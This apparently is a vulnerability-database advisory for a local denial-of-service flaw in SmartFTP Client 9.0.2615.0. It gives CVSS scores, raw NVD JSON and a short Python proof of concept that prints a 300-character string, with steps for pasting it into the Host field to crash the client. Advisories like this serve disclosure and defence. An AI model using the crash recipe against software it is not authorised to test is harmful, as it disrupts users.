Security Vulnerability Report
CVE-2018-25234 CVSS 6.2 MEDIUM

CVE-2018-25234

Published: 2026-03-30 12:16:18
Last Modified: 2026-04-08 16:37:57

Description

SmartFTP Client 9.0.2615.0 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string in the Host field. Attackers can paste a buffer of 300 repeated characters into the Host connection parameter to trigger an application crash.

CVSS Details

CVSS Score: 6.2
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:smartftp:smartftp:*:*:*:*:*:*:*:* - VULNERABLE
SmartFTP Client 9.0.2615.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys

# Proof of Concept (PoC) for CVE-2018-25234
# Vulnerability: SmartFTP Client 9.0.2615.0 Denial of Service
# Description: Supplying a buffer of 300 repeated characters in the Host field crashes the app.


def generate_payload():
    # The vulnerability is triggered by a long string in the Host field.
    # Testing indicates 300 characters are sufficient.
    buffer_size = 300
    payload = "A" * buffer_size
    return payload


if __name__ == "__main__":
    crash_string = generate_payload()
    print(f"Generated Payload: {crash_string}")
    print("Steps to reproduce:")
    print("1. Open SmartFTP Client 9.0.2615.0")
    print("2. Go to connection settings (New Connection)")
    print("3. Paste the above payload into the 'Host' field")
    print("4. The application should crash (Denial of Service)")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2018-25234", "sourceIdentifier": "[email protected]", "published": "2026-03-30T12:16:17.510", "lastModified": "2026-04-08T16:37:56.523", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SmartFTP Client 9.0.2615.0 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string in the Host field. Attackers can paste a buffer of 300 repeated characters into the Host connection parameter to trigger an application crash."}, {"lang": "es", "value": "SmartFTP Cliente 9.0.2615.0 contiene una vulnerabilidad de denegación de servicio que permite a atacantes locales bloquear la aplicación al proporcionar una cadena excesivamente larga en el campo Host. Los atacantes pueden pegar un búfer de 300 caracteres repetidos en el parámetro de conexión Host para provocar un bloqueo de la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", 
"modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-466"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:smartftp:smartftp:*:*:*:*:*:*:*:*", "versionEndIncluding": "9.0.2615.0", "matchCriteriaId": "FCBEDBBB-E8AF-4D4D-8F3F-26B31BAB5ABA"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/45759", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.smartftp.com/en-us/", "source": 
"[email protected]", "tags": ["Product"]}, {"url": "https://www.smartftp.com/en-us/download", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/smartftp-client-denial-of-service-via-host-field", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}